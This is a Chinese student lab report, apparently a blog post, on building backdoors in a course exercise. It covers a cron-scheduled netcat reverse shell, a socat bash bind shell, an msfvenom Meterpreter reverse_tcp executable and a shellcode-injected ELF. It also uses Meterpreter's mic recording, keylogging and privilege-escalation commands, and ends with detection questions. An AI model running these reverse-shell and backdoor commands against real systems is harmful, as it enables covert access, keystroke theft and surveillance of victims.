在此任務中,我將kali做爲受害機,MacOS系統做爲攻擊機html
nc -l 5315
crontab -e
,選擇vim.basic編輯器06 * * * * /bin/netcat 10.0.0.165 5303 -e /bin/sh
,使每一個小時的第6分鐘反向鏈接Mac主機的5315端口(我作實驗正好是第5分鐘,命令中IP地址爲攻擊機IP)socat簡介:linux
socat是一個多功能的網絡工具,名字來由是「 Socket CAT」,能夠看做是netcat的N倍增強版。web
socat是一個兩個獨立數據通道之間的雙向數據傳輸的繼電器。這些數據通道包含文件、管道、設備(終端或調制解調器等)、插座(Unix,IP4,IP6 - raw,UDP,TCP)、SSL、SOCKS4客戶端或代理CONNECT。socat支持廣播和多播、抽象Unix sockets、Linux tun/tap、GNU readline 和 PTY。它提供了分叉、記錄和進程間通訊的不一樣模式。shell
socat的主要特色就是在兩個數據流之間創建通道;且支持衆多協議和連接方式:ip,tcp,udp,ipv6,pipe,exec,system,open,proxy,openssl,socket等。vim
因爲個人主機是MacOS系統,故沒有按照老師的指導方法進行操做,具體操做參考自該博客。windows
此項任務中我將MacOS系統做爲受害機,Kali做爲攻擊機。安全
brew install socat
socat tcp-l:5315 system:bash,pty,stderr
指令,進行端口轉發socat - tcp:10.1.1.165:5315
,獲取受害機shell操做權(命令中IP地址爲受害機IP)Meterpreter簡介:bash
Meterpreter是Metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個Meterpreter shell的連接。網絡
Meterpreter shell做爲滲透模塊有不少有用的功能,好比打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息等等。另外Meterpreter可以躲避入侵檢測系統。在遠程主機上隱藏本身,它不改變系統硬盤中的文件,所以HIDS[基於主機的入侵檢測系統]很難對它作出響應。Meterpreter還能夠簡化任務建立多個會話。能夠來利用這些會話進行滲透。框架
因爲MacOS系統沒法執行exe文件,故此任務我仍是用了win7的虛擬機,按照老師的指導方法進行操做。
此項任務中我將Win7系統做爲受害機,Kali做爲攻擊機。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.196.188 LPORT=5315 -f exe > 20165315_backdoor.exe
,生成後門程序「20155312_backdoor.exe」(命令中IP地址爲攻擊機IP)ncat -l 5315 > 20165315_backdoor.exe
nc 10.1.1.143 5315 < 20165315_backdoor.exe
(命令中IP地址爲受害機IP)msfconsole
指令進入msf控制檯# use exploit/multi/handler //使用監聽模塊,設置payload # set payload windows/meterpreter/reverse_tcp //使用和生成後門程序時相同的payload # set LHOST 192.168.192.188 //這裏用的是LinuxIP,和生成後門程序時指定的IP相同 # set LPORT 5315 //一樣要使用相同的端口
exploit
開始監聽20165315_backdoor.exe
record_mic
指令能夠截獲一段音頻在當前目錄下可找到存儲的音頻文件:
webcam_snap
指令可使用攝像頭進行拍照因爲個人虛擬機是Win7系統,沒有攝像功能,而主機又是MacOS系統,找了半天都沒找到怎麼開啓攝像機...可是這個指令我已經明白如何使用,沒有截圖但願老師諒解~
keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄getuid
指令查看當前用戶,使用getsystem
指令進行提權,因爲是Win7系統,提權失敗這一項任務還在嘗試,若是作出來會有後期更新~
經過後期的嘗試與參考這個博客,任務完成過程以下~
此項任務中我將Kali的終端1做爲受害機,終端2做爲攻擊機(這是因爲Windows系統沒法執行pwn1文件)。
經過MSF生成shellcode,並注入20165315pwn1,生成20165315_msf後門程序,指令爲msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.196.190 LPORT=5315 -x /root/20165315/exp1/20165315pwn1 -f elf > 20165315_msf
使用msfconsole控制檯
在另外一個終端中,運行生成的20165315_msf文件,會發現控制檯已獲取該終端shell權限
在作任務三的時候,我原本想像任務二同樣,在網上找一下針對mac的攻擊教程,可是在運行到msf控制檯時,發現執行exploit指令時,因爲macOS系統沒法執行exe文件,致使kali沒法進行攻擊(這說明macOS真的安全)
後來我查到一個博客,能夠用msfvenom -p linux/x86/meterpreter/reverse_tcp lhost lport -f elf -o shell
指令,雖然文件是生成了,可是...mac仍是不能運行這個文件!太安全了致使實驗作不了很難受了QAQ
解決過程:
大丈夫能屈能伸,我...最後仍是選擇了Win7虛擬機...若是有大神知道怎麼攻擊Mac麻煩在評論裏指導我一下,蟹蟹!
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
當朋友的QQ號被盜後,攻擊者借QQ號向我發送自動下載惡意後門程序的連接,假稱這是投票連接,若是我沒有防範意識,直接點擊連接,就會自動下載惡意程序,對電腦的安全形成很大的影響。
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
Windows可使用任務計劃,或者當在運行一個含有綁定後門程序的軟件時,後門就能夠被開啓;linux可使用cron定時觸發,也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的
(3)Meterpreter有哪些給你映像深入的功能?
能夠經過反向連接,獲取全部執行了含後門的可執行文件的主機shell操做權,從而獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息等等。
(4)如何發現本身有系統有沒有被安裝後門?
查看開機自啓動項、任務計劃程序中是否有可疑程序;安裝專門的殺毒軟件,實時防禦;查看本機端口,判斷是否有被異常開放的端口等等。
此次實驗趣味性很強,經過學習老師教程以及學長學姐的博客,基本都可以完成實驗。在此次實驗中,我學會了利用後門程序對主機進行注入攻擊,學會了使用netcat、socat、meterpreter等,雖然內容簡單,但我已經基本瞭解後門的基本原理。在從此的學習中,我將會進一步深刻研究後門的各類理論知識。
本次實驗也讓我更加了解了一些網絡攻擊的手段,增強了網絡安全防範意識。